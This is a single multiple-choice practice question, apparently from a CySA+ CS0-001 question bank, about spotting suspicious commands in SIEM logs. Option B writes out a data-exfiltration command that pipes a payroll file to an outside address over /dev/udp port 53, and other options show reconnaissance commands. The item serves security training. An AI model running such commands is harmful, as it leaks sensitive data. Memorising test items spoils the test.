CySA+ CS0-001 – Q. 363


A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A. nmap -A -sV
B. cat payroll.csv > /dev/udp/123.456.123.456/53
C. cat/etc/passwd
D. mysql -h -u test -p